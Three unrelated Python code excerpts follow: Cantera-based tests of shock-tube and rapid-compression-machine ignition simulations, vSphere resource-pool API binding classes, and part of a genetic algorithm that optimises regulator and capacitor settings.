filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
assert len(simulations) == 1
mechanism_filename = 'gri30.xml'
SPEC_KEY = {'H2': 'H2', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
init_temp = 1264.2
init_pres = 2.18 * ct.one_atm
gas = ct.Solution(mechanism_filename)
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY)
assert sim.apparatus == 'shock tube'
assert np.allclose(sim.time_end, 2.9157e-2)
assert np.allclose(sim.gas.T, init_temp)
assert np.allclose(sim.gas.P, init_pres)
mass_fracs = np.zeros(sim.gas.n_species)
mass_fracs[sim.gas.species_index(SPEC_KEY['H2'])] = 0.00444
mass_fracs[sim.gas.species_index(SPEC_KEY['O2'])] = 0.00556
mass_fracs[sim.gas.species_index(SPEC_KEY['Ar'])] = 0.99
assert np.allclose(sim.gas.X, mass_fracs)
assert sim.n_vars == gas.n_species + 3
# Check constructed velocity profile
[times, volumes] = simulation.create_volume_history(
mechanism_filename, init_temp, init_pres,
'H2:0.00444,O2:0.00566,AR:0.9899',
0.10 * 1000., sim.time_end
)
volumes = volumes / volumes[0]
dVdt = simulation.first_derivative(times, volumes)
velocities = np.zeros(times.size)
for i, time in enumerate(times):
velocities[i] = sim.reac.walls[0].vdot(time)
assert np.allclose(dVdt, velocities, rtol=1e-3)
def test_rcm_setup_case(self):
"""Test that RCM case is set up properly.
"""
file_path = os.path.join('testfile_rcm.yaml')
filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
assert len(simulations) == 1
mechanism_filename = 'gri30.xml'
SPEC_KEY = {'H2': 'H2', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
gas = ct.Solution(mechanism_filename)
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY)
assert sim.apparatus == 'rapid compression machine'
assert np.allclose(sim.time_end, 0.1)
assert np.allclose(sim.gas.T, 297.4)
assert np.allclose(sim.gas.P, 127722.83)
mass_fracs = np.zeros(sim.gas.n_species)
mass_fracs[sim.gas.species_index(SPEC_KEY['H2'])] = 0.12500
mass_fracs[sim.gas.species_index(SPEC_KEY['O2'])] = 0.06250
mass_fracs[sim.gas.species_index(SPEC_KEY['N2'])] = 0.18125
mass_fracs[sim.gas.species_index(SPEC_KEY['Ar'])] = 0.63125
assert np.allclose(sim.gas.X, mass_fracs)
times = np.arange(0, 9.7e-2, 1.e-3)
volumes = np.array([
5.47669375000E+002, 5.46608789894E+002, 5.43427034574E+002,
5.38124109043E+002, 5.30700013298E+002, 5.21154747340E+002,
5.09488311170E+002, 4.95700704787E+002, 4.79791928191E+002,
4.61761981383E+002, 4.41610864362E+002, 4.20399162234E+002,
3.99187460106E+002, 3.77975757979E+002, 3.56764055851E+002,
3.35552353723E+002, 3.14340651596E+002, 2.93128949468E+002,
2.71917247340E+002, 2.50705545213E+002, 2.29493843085E+002,
2.08282140957E+002, 1.87070438830E+002, 1.65858736702E+002,
1.44647034574E+002, 1.23435332447E+002, 1.02223630319E+002,
8.10119281915E+001, 6.33355097518E+001, 5.27296586879E+001,
4.91943750000E+001, 4.97137623933E+001, 5.02063762048E+001,
5.06454851923E+001, 5.10218564529E+001, 5.13374097598E+001,
5.16004693977E+001, 5.18223244382E+001, 5.20148449242E+001,
5.21889350372E+001, 5.23536351113E+001, 5.25157124459E+001,
5.26796063730E+001, 5.28476160610E+001, 5.30202402028E+001,
5.31965961563E+001, 5.33748623839E+001, 5.35527022996E+001,
5.37276399831E+001, 5.38973687732E+001, 5.40599826225E+001,
5.42141273988E+001, 5.43590751578E+001, 5.44947289126E+001,
5.46215686913E+001, 5.47405518236E+001, 5.48529815402E+001,
5.49603582190E+001, 5.50642270863E+001, 5.51660349836E+001,
5.52670070646E+001, 5.53680520985E+001, 5.54697025392E+001,
5.55720927915E+001, 5.56749762728E+001, 5.57777790517E+001,
5.58796851466E+001, 5.59797461155E+001, 5.60770054561E+001,
5.61706266985E+001, 5.62600130036E+001, 5.63449057053E+001,
5.64254496625E+001, 5.65022146282E+001, 5.65761642150E+001,
5.66485675508E+001, 5.67208534842E+001, 5.67944133373E+001,
5.68703658198E+001, 5.69493069272E+001, 5.70310785669E+001,
5.71146023893E+001, 5.71978399741E+001, 5.72779572372E+001,
5.73517897984E+001, 5.74167271960E+001, 5.74721573687E+001,
5.75216388520E+001, 5.75759967785E+001, 5.76575701358E+001,
5.78058719368E+001, 5.80849611077E+001, 5.85928651155E+001,
5.94734357453E+001, 6.09310671165E+001, 6.32487551103E+001,
6.68100309742E+001
])
volumes = volumes / volumes[0]
dVdt = simulation.first_derivative(times, volumes)
velocities = np.zeros(times.size)
for i, time in enumerate(times):
velocities[i] = sim.reac.walls[0].vdot(time)
assert np.allclose(dVdt, velocities)
assert sim.n_vars == gas.n_species + 3
@pytest.mark.xfail(reason="cannot currently guarantee integration to specified end time")
def test_shock_tube_run_cases(self):
"""Test that shock tube cases run correctly.
"""
# Read experiment XML file
file_path = os.path.join('testfile_st.yaml')
filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
mechanism_filename = 'gri30.xml'
SPEC_KEY = {'H2': 'H2', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
# Setup and run each simulation
with TemporaryDirectory() as temp_dir:
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY, path=temp_dir)
sim.run_case()
# check for presence of data file
assert os.path.exists(sim.meta['save-file'])
with tables.open_file(sim.meta['save-file'], 'r') as h5file:
# Load Table with Group name simulation
table = h5file.root.simulation
# Ensure exact columns present
assert set(['time', 'temperature', 'pressure',
'volume', 'mass_fractions'
]) == set(table.colnames)
# Ensure final state matches expected
time_end = 4.7154e-2
temp = 1250.440275095967
pres = 235715.78371450436
mass_fracs = np.array([
3.78280811e-09, 6.55635749e-11, 3.88632912e-08,
2.68924922e-03, 9.14481216e-07, 2.01249201e-03,
7.30336393e-09, 4.48899838e-10, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
9.95297294e-01, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00
])
assert np.allclose(table.col('time')[-1], time_end)
assert np.allclose(table.col('temperature')[-1], temp)
assert np.allclose(table.col('pressure')[-1], pres)
assert np.allclose(table.col('mass_fractions')[-1],
mass_fracs, rtol=1e-5, atol=1e-9
)
sim = simulations[1]
sim.setup_case(mechanism_filename, SPEC_KEY, path=temp_dir)
sim.run_case()
assert os.path.exists(sim.meta['save-file'])
with tables.open_file(sim.meta['save-file'], 'r') as h5file:
# Load Table with Group name simulation
table = h5file.root.simulation
# Ensure exact columns present
assert set(['time', 'temperature', 'pressure',
'volume', 'mass_fractions'
]) == set(table.colnames)
# Ensure final state matches expected
time_end = 4.4803e-2
temp = 1250.9289794273782
pres = 235708.7300698561
mass_fracs = np.array([
4.09616997e-09, 7.26607683e-11, 4.16076690e-08,
2.68923307e-03, 9.47551606e-07, 2.01247148e-03,
7.82886351e-09, 4.77404824e-10, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
9.95297294e-01, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00
])
assert np.allclose(table.col('time')[-1], time_end)
assert np.allclose(table.col('temperature')[-1], temp)
assert np.allclose(table.col('pressure')[-1], pres)
assert np.allclose(table.col('mass_fractions')[-1],
mass_fracs, rtol=1e-5, atol=1e-9
)
@pytest.mark.xfail(reason="cannot currently guarantee integration to specified end time")
def test_shock_tube_pressure_rise_run_cases(self):
"""Test that shock tube cases with pressure rise run correctly.
"""
# Read experiment XML file
file_path = os.path.join('testfile_st2.yaml')
filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
mechanism_filename = 'gri30.xml'
SPEC_KEY = {'H2': 'H2', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
# Setup and run each simulation
with TemporaryDirectory() as temp_dir:
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY, path=temp_dir)
sim.run_case()
# check for presence of data file
assert os.path.exists(sim.meta['save-file'])
with tables.open_file(sim.meta['save-file'], 'r') as h5file:
# Load Table with Group name simulation
table = h5file.root.simulation
# Ensure exact columns present
assert set(['time', 'temperature', 'pressure',
'volume', 'mass_fractions'
]) == set(table.colnames)
# Ensure final state matches expected
time_end = 2.9157e-2
temp = 2305.9275837885516
pres = 915452.1978990212
mass_fracs = np.array([
2.55673782e-06, 5.70019832e-07, 3.73361152e-05,
2.61559579e-03, 1.30748753e-04, 1.91579133e-03,
1.04724319e-07, 2.70985419e-09, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
9.95297294e-01, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00
])
assert np.allclose(table.col('time')[-1], time_end)
assert np.allclose(table.col('temperature')[-1], temp)
assert np.allclose(table.col('pressure')[-1], pres)
assert np.allclose(table.col('mass_fractions')[-1],
mass_fracs, rtol=1e-5, atol=1e-9
)
@pytest.mark.xfail(reason="cannot currently guarantee integration to specified end time")
def test_rcm_run_cases(self):
"""Test that RCM case runs correctly.
"""
# Read experiment XML file
file_path = os.path.join('testfile_rcm.yaml')
filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
mechanism_filename = 'gri30.xml'
SPEC_KEY = {'H2': 'H2', 'O2': 'O2', 'N2': 'N2', 'Ar': 'AR'}
# Setup and run each simulation
with TemporaryDirectory() as temp_dir:
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY, path=temp_dir)
sim.run_case()
# check for presence of data file
assert os.path.exists(sim.meta['save-file'])
with tables.open_file(sim.meta['save-file'], 'r') as h5file:
# Load Table with Group name simulation
table = h5file.root.simulation
# Ensure exact columns present
assert set(['time', 'temperature', 'pressure',
'volume', 'mass_fractions'
]) == set(table.colnames)
# Ensure final state matches expected
time_end = 1.0e-1
temp = 2385.3726323703772
pres = 7785283.273098443
mass_fracs = np.array([
1.20958787e-04, 2.24531172e-06, 1.00369447e-05,
5.22700388e-04, 4.28382158e-04, 6.78623202e-02,
4.00112919e-07, 1.46544920e-07, 1.20831350e-32,
3.89605241e-34, -3.39400724e-33, -2.46590209e-34,
-1.74786488e-31, -5.36410698e-31, 4.72585636e-27,
7.94725956e-26, 5.20640355e-33, 2.16633481e-32,
2.74982659e-34, 5.20547210e-35, 5.96795929e-33,
-2.98353670e-48, -1.16084981e-45, -2.33518734e-48,
-6.38881605e-47, -3.09502377e-48, -8.14011410e-48,
-6.95137295e-47, -8.71647858e-47, -3.34677877e-46,
2.05479180e-09, 1.59879068e-09, 2.45613053e-09,
2.06962550e-08, 2.82124731e-09, 4.55692132e-04,
3.22230699e-07, 1.49833621e-07, 5.93547268e-08,
-2.74353105e-33, -1.17993222e-30, -5.51437143e-36,
-9.13974801e-37, -1.97028722e-31, -9.69084296e-32,
-1.31976752e-30, -2.12060990e-32, 1.55792718e-01,
7.74803838e-01, 2.72630502e-66, 2.88273784e-67,
-2.18774836e-50, -1.47465442e-48
])
assert np.allclose(table.col('time')[-1], time_end)
assert np.allclose(table.col('temperature')[-1], temp,
rtol=1e-5, atol=1e-9
)
assert np.allclose(table.col('pressure')[-1], pres,
rtol=1e-5, atol=1e-9
)
assert np.allclose(table.col('mass_fractions')[-1],
mass_fracs, rtol=1e-4, atol=1e-8
)
# TODO: add test for restart option
def test_capitalization_species_target(self):
"""Test that species targets with capitalization not matching model works.
"""
file_path = os.path.join('testfile_st2.yaml')
filename = pkg_resources.resource_filename(__name__, file_path)
properties = ChemKED(filename, skip_validation=True)
# ignition target is OH
# Now create list of Simulation objects
simulations = create_simulations(filename, properties)
file_path = os.path.join('h2o2-lowercase.cti')
mechanism_filename = pkg_resources.resource_filename(__name__, file_path)
SPEC_KEY = {'H2': 'h2', 'O2': 'o2', 'N2': 'n2', 'Ar': 'ar'}
sim = simulations[0]
sim.setup_case(mechanism_filename, SPEC_KEY)
# oh is species index 4
assert sim.properties.ignition_target == 4
# now try for uppercase in model and lowercase in file.
properties = ChemKED(filename, skip_validation=True)
properties.datapoints[0].ignition_type['target'] = 'oh'
SPEC_KEY | |
In a resource pool with an expandable reservation, the reservation
can grow beyond the specified value, if the parent resource pool
has unreserved resources. A non-expandable reservation is called a
fixed reservation. This attribute was added in vSphere API 7.0.0.
:type limit: :class:`long`
:param limit: The utilization of a resource pool will not exceed this limit, even
if there are available resources. This is typically used to ensure
a consistent performance of resource pools independent of available
resources. If set to -1, then there is no fixed limit on resource
usage (only bounded by available resources and shares). Units are
MB for memory, and MHz for CPU. This attribute was added in vSphere
API 7.0.0.
:type shares: :class:`ResourcePool.SharesInfo`
:param shares: Shares are used in case of resource contention. This attribute was
added in vSphere API 7.0.0.
"""
self.reservation = reservation
self.expandable_reservation = expandable_reservation
self.limit = limit
self.shares = shares
VapiStruct.__init__(self)
ResourceAllocationInfo._set_binding_type(type.StructType(
'com.vmware.vcenter.resource_pool.resource_allocation_info', {
'reservation': type.IntegerType(),
'expandable_reservation': type.BooleanType(),
'limit': type.IntegerType(),
'shares': type.ReferenceType(__name__, 'ResourcePool.SharesInfo'),
},
ResourceAllocationInfo,
False,
None))
class Info(VapiStruct):
"""
The ``ResourcePool.Info`` class contains information about a resource pool.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
name=None,
resource_pools=None,
cpu_allocation=None,
memory_allocation=None,
):
"""
:type name: :class:`str`
:param name: Name of the vCenter Server resource pool.
:type resource_pools: :class:`set` of :class:`str`
:param resource_pools: Identifiers of the child resource pools contained in this resource
pool.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``ResourcePool``. When methods return a value of this class as a
return value, the attribute will contain identifiers for the
resource type: ``ResourcePool``.
:type cpu_allocation: :class:`ResourcePool.ResourceAllocationInfo`
:param cpu_allocation: Resource allocation information for CPU. This attribute was added
in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type memory_allocation: :class:`ResourcePool.ResourceAllocationInfo`
:param memory_allocation: Resource allocation information for memory. This attribute was
added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
"""
self.name = name
self.resource_pools = resource_pools
self.cpu_allocation = cpu_allocation
self.memory_allocation = memory_allocation
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.resource_pool.info', {
'name': type.StringType(),
'resource_pools': type.SetType(type.IdType()),
'cpu_allocation': type.OptionalType(type.ReferenceType(__name__, 'ResourcePool.ResourceAllocationInfo')),
'memory_allocation': type.OptionalType(type.ReferenceType(__name__, 'ResourcePool.ResourceAllocationInfo')),
},
Info,
False,
None))
class FilterSpec(VapiStruct):
"""
The ``ResourcePool.FilterSpec`` class contains attributes used to filter
the results when listing resource pools (see :func:`ResourcePool.list`). If
multiple attributes are specified, only resource pools matching all of the
attributes match the filter.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
resource_pools=None,
names=None,
parent_resource_pools=None,
datacenters=None,
hosts=None,
clusters=None,
):
"""
:type resource_pools: :class:`set` of :class:`str` or ``None``
:param resource_pools: Identifiers of resource pools that can match the filter.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``ResourcePool``. When methods return a value of this class as a
return value, the attribute will contain identifiers for the
resource type: ``ResourcePool``.
If None or empty, resource pools with any identifier match the
filter.
:type names: :class:`set` of :class:`str` or ``None``
:param names: Names that resource pools must have to match the filter (see
:attr:`ResourcePool.Info.name`).
If None or empty, resource pools with any name match the filter.
:type parent_resource_pools: :class:`set` of :class:`str` or ``None``
:param parent_resource_pools: Resource pools that must contain the resource pool for the resource
pool to match the filter.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``ResourcePool``. When methods return a value of this class as a
return value, the attribute will contain identifiers for the
resource type: ``ResourcePool``.
If None or empty, resource pools in any resource pool match the
filter.
:type datacenters: :class:`set` of :class:`str` or ``None``
:param datacenters: Datacenters that must contain the resource pool for the resource
pool to match the filter.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``Datacenter``. When methods return a value of this class as a
return value, the attribute will contain identifiers for the
resource type: ``Datacenter``.
If None or empty, resource pools in any datacenter match the
filter.
:type hosts: :class:`set` of :class:`str` or ``None``
:param hosts: Hosts that must contain the resource pool for the resource pool to
match the filter.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``HostSystem``. When methods return a value of this class as a
return value, the attribute will contain identifiers for the
resource type: ``HostSystem``.
If None or empty, resource pools in any host match the filter.
:type clusters: :class:`set` of :class:`str` or ``None``
:param clusters: Clusters that must contain the resource pool for the resource pool
to match the filter.
When clients pass a value of this class as a parameter, the
attribute must contain identifiers for the resource type:
``ClusterComputeResource``. When methods return a value of this
class as a return value, the attribute will contain identifiers for
the resource type: ``ClusterComputeResource``.
If None or empty, resource pools in any cluster match the filter.
"""
self.resource_pools = resource_pools
self.names = names
self.parent_resource_pools = parent_resource_pools
self.datacenters = datacenters
self.hosts = hosts
self.clusters = clusters
VapiStruct.__init__(self)
FilterSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.resource_pool.filter_spec', {
'resource_pools': type.OptionalType(type.SetType(type.IdType())),
'names': type.OptionalType(type.SetType(type.StringType())),
'parent_resource_pools': type.OptionalType(type.SetType(type.IdType())),
'datacenters': type.OptionalType(type.SetType(type.IdType())),
'hosts': type.OptionalType(type.SetType(type.IdType())),
'clusters': type.OptionalType(type.SetType(type.IdType())),
},
FilterSpec,
False,
None))
class Summary(VapiStruct):
"""
The ``ResourcePool.Summary`` class contains commonly used information about
a resource pool in vCenter Server.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
resource_pool=None,
name=None,
):
"""
:type resource_pool: :class:`str`
:param resource_pool: Identifier of the resource pool.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``ResourcePool``. When methods return a value of this class as a
return value, the attribute will be an identifier for the resource
type: ``ResourcePool``.
:type name: :class:`str`
:param name: Name of the resource pool.
"""
self.resource_pool = resource_pool
self.name = name
VapiStruct.__init__(self)
Summary._set_binding_type(type.StructType(
'com.vmware.vcenter.resource_pool.summary', {
'resource_pool': type.IdType(resource_types='ResourcePool'),
'name': type.StringType(),
},
Summary,
False,
None))
class ResourceAllocationCreateSpec(VapiStruct):
"""
The ``ResourcePool.ResourceAllocationCreateSpec`` class contains resource
allocation information used to create a resource pool, see
:func:`ResourcePool.create`. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
reservation=None,
expandable_reservation=None,
limit=None,
shares=None,
):
"""
:type reservation: :class:`long` or ``None``
:param reservation: Amount of resource that is guaranteed available to a resource pool.
Reserved resources are not wasted if they are not used. If the
utilization is less than the reservation, the resources can be
utilized by other running virtual machines. Units are MB fo memory,
and MHz for CPU. This attribute was added in vSphere API 7.0.0.
If None or empty,
:attr:`ResourcePool.ResourceAllocationCreateSpec.reservation` will
be set to 0.
:type expandable_reservation: :class:`bool` or ``None``
:param expandable_reservation: In a resource pool with an expandable reservation, the reservation
can grow beyond the specified value, if the parent resource pool
has unreserved resources. A non-expandable reservation is called a
fixed reservation. This attribute was added in vSphere API 7.0.0.
If None or empty,
:attr:`ResourcePool.ResourceAllocationCreateSpec.expandable_reservation`
will be set to true.
:type limit: :class:`long` or ``None``
:param limit: The utilization of a resource pool will not exceed this limit, even
if there are available resources. This is typically used to ensure
a consistent performance of resource pools independent of available
resources. If set to -1, then there is no fixed limit on resource
usage (only bounded by available resources and shares). Units are
MB for memory, and MHz for CPU. This attribute was added in vSphere
API 7.0.0.
If None or empty,
:attr:`ResourcePool.ResourceAllocationCreateSpec.limit` will | |
t1-t0, g+1))
# If this is the first generation and we're tracking a baseline,
# save the requisite information.
if (g == 0) and (self.baselineIndex is not None):
# Get a reference to the individual
bInd = self.individualsList[self.baselineIndex]
# Clear the index (individual will get sorted
self.baselineIndex = None
# Save information.
self.baselineData = {'costs': copy.deepcopy(bInd.costs),
'cap': copy.deepcopy(bInd.cap),
'reg': copy.deepcopy(bInd.reg)}
# Get a well formatted string representation
self.baselineData['str'] = \
helper.getSummaryStr(costs=self.baselineData['costs'],
reg=self.baselineData['reg'],
cap=self.baselineData['cap'])
self.log.debug('Baseline individual data assigned.')
self.log.debug('Baseline costs:\n{}'.format(
json.dumps(bInd.costs, indent=4)))
# Sort the individualsList by score.
self.individualsList.sort(key=lambda x: x.costs['total'])
# Track best score for this generation.
self.generationBest.append(self.individualsList[0].costs['total'])
self.log.info('Lowest cost for this generation: {:.2f}'.format(
self.generationBest[-1]))
# Increment generation counter.
g += 1
# This could probably be refactored, but anyways...
# perform natural selection, crossing, mutation, and model runs if
# we're not in the last generation.
if g < self.numGen:
# Select the fittest individuals and some unfit ones.
self.naturalSelection()
msg = 'Natural selection complete for generation {}'.format(g)
self.log.info(msg)
# Measure diversity
# regDiff, capDiff = self.measureDiversity()
# Replenish the population by crossing and mutating individuals
# then run their models.
t0 = time.time()
model_count = self.crossMutateRun()
msg = 'Cross and mutate complete for generation {}.'.format(g)
self.log.info(msg)
msg = (' All models should now be running for generation {'
'}.').format(g + 1)
self.log.info(msg)
# Done.
self.log.info('Genetic algorithm complete.')
self.log.info('Lowest cost: {:.2f}'.format(self.generationBest[-1]))
# Return the best individual.
return self.individualsList[0]
def addToModelQueue(self, individual):
"""Helper function to put an individual and relevant inputs into a
dictionary to run a model.
"""
self.modelQueue.put_nowait({'individual': individual,
'strModel': self.strModel,
'inPath': self.inPath,
'outDir': self.outDir})
uid = individual.uid
self.log.debug(
'Individual with UID {} put in model queue.'.format(uid))
def naturalSelection(self):
"""Determines which individuals will be used to create next generation.
"""
# Determine how many individuals to keep for certain.
k = math.ceil(self.probabilities['top'] * len(self.individualsList))
self.log.debug('Keeping a minimum of {} individuals.'.format(k))
# Loop over the unfit individuals, and either delete or keep based on
# the weakProb
i = 0
while i < len(self.individualsList):
# If we are past the k'th individual and the random draw mandates
# it, kill it.
if (i >= k) and (random.random() < self.probabilities['weak']):
# Remove indiviual from individualsList, cleanup.
ind = self.individualsList.pop(i)
self.log.debug(('Killing individual {} via natural '
+ 'selection').format(ind.uid))
self.popMgr.clean(tableSuffix=ind.tableSuffix, uid=ind.uid,
kill=True)
# No need to increment the index since we removed the
# individual.
continue
# Add the cost to the fit sum, increment the index. Note that the
# fit sum gets zeroed out in the 'prep' function
self.fitSum += self.individualsList[i].costs['total']
i += 1
self.log.debug(('Death by natural selection complete. There are {} '
+ 'surviving '
+ 'individuals.').format(len(self.individualsList)))
# Create weights by standard cost weighting.
self.rouletteWeights = []
for ind in self.individualsList:
self.rouletteWeights.append((ind.costs['total'] / self.fitSum))
'''
self.rouletteWeights.append(1 / (individual.costs['total']
/ self.fitSum))
'''
self.log.debug('Roulette weights assigned for each individual.')
def crossMutateRun(self):
"""Crosses traits from surviving individuals to regenerate population,
then runs the new individuals to evaluate their cost.
"""
count = 0
# Loop until population has been replenished.
# Extract the number of individuals.
n = len(self.individualsList)
# chooseCount = []
while len(self.individualsList) < self.numInd:
if random.random() < self.probabilities['cross']:
# Since we're crossing over, we won't force a mutation.
forceMutate = False
# Prime loop to select two unique individuals. Loop ensures
# unique individuals are chosen.
_individualsList = [0, 0]
while _individualsList[0] == _individualsList[1]:
# Pick two individuals based on cumulative weights.
_individualsList = random.choices(
self.individualsList[0:n],
weights= \
self.rouletteWeights,
k=2)
# Keep track of who created these next individuals.
parents = (_individualsList[0].uid, _individualsList[1].uid)
self.log.debug(('Individuals {} and {} selected for '
+ 'crossing').format(parents[0], parents[1]))
# Cross the regulator chromosomes
regChroms = crossChrom(chrom1=_individualsList[0].regChrom,
chrom2=_individualsList[1].regChrom)
self.log.debug('Regulator chromosomes crossed.')
# Cross the capaictor chromosomes
capChroms = crossChrom(chrom1=_individualsList[0].capChrom,
chrom2=_individualsList[1].capChrom)
self.log.debug('Capacitor chromosomes crossed.')
else:
# We're not crossing over, so force mutation.
forceMutate = True
# Draw an individual.
_individualsList = random.choices(self.individualsList[0:n],
weights=self.rouletteWeights,
k=1)
# Track parents
parents = (_individualsList[0].uid,)
self.log.debug(('No crossing, just mutation of individual '
+ '{}'.format(parents[0])))
# Grab the necessary chromosomes, put in a list
regChroms = [_individualsList[0].regChrom]
capChroms = [_individualsList[0].capChrom]
# Track chosen individuals.
"""
for i in _individualsList:
uids = [x[1] for x in chooseCount]
if i.uid in uids:
ind = uids.index(i.uid)
# Increment the occurence count
chooseCount[ind][2] += 1
else:
chooseCount.append([i.fitness, i.uid, 1])
"""
# Possibly mutate individual(s).
if forceMutate or (random.random() < self.probabilities['mutate']):
# Mutate regulator chromosome:
regChroms = mutateChroms(c=regChroms,
prob=self.probabilities['regMutate'])
self.log.debug('Regulator chromosome(s) mutated.')
# Mutate capacitor chromosome:
capChroms = mutateChroms(c=capChroms,
prob=self.probabilities['capMutate'])
self.log.debug('Capacitor chromosome(s) mutated.')
# Create individuals based on new chromosomes, add to list, put
# in queue for processing.
for i in range(len(regChroms)):
# Initialize new individual
uid = self.popMgr.getUID()
ind = individual(**self.indInputs,
uid=uid,
regChrom=regChroms[i],
capChrom=capChroms[i],
parents=parents,
)
self.log.debug('New individual, {}, initialized'.format(uid))
# Put individual in the list and the queue.
self.individualsList.append(ind)
self.addToModelQueue(individual=ind)
count += 1
self.log.debug(('Individual {} put in the model '
+ 'queue.').format(uid))
return count
"""
# Sort the chooseCount by number of occurences
chooseCount.sort(key=lambda x: x[2])
print('Fitness, UID, Occurences', flush=True)
for el in chooseCount:
print('{:.2f},{},{}'.format(el[0], el[1], el[2]))
"""
def measureDiversity(self):
"""Function to loop over chromosomes and count differences between
individuals. This information is useful in a histogram.
"""
# Compute diversity
n = 0
regDiff = []
capDiff = []
# Loop over all individuals in the list
for ind in self.individualsList:
n += 1
# Loop over all individuals later in the list
for i in range(n, len(self.individualsList)):
# Loop over reg chrom, count differences.
regCount = 0
for g in range(0, len(ind.regChrom)):
if ind.regChrom[g] != self.individualsList[i].regChrom[g]:
regCount += 1
regDiff.append(regCount)
# Loop over cap chrom, count differences.
capCount = 0
for g in range(0, len(ind.capChrom)):
if ind.capChrom[g] != self.individualsList[i].capChrom[g]:
capCount += 1
capDiff.append(capCount)
return regDiff, capDiff
def stopThreads(self, timeout=10):
"""Function to gracefully stop the running threads.
"""
# Signal to threads that we're done by putting 'None' in the queue.
for _ in self.modelThreads: self.modelQueue.put_nowait(None)
for t in self.modelThreads: t.join(timeout=timeout)
# print('Threads terminated.', flush=True)
def writeRunEval(modelQueue, costs, log):
# , cnxnpool):
# tEvent):
"""Write individual's model, run the model, and evaluate costs. This is
effectively a wrapper for individual.writeRunUpdateEval()
NOTE: will take no action if an individual's model has already been
run.
NOTE: This function is static due to the threading involved. This feels
memory inefficient but should save some headache.
NOTE: This function is specifically formatted to be run via a thread
object which is terminated when a 'None' object is put in the
modelQueue.
INPUTS:
modelQueue: queue which will have dictionaries inserted into it.
dictionaries should contain individual, strModel, inPath,
and outDir fields from a population object.
"""
while True:
try:
# Extract an individual from the queue.
inDict = modelQueue.get()
# Check input.
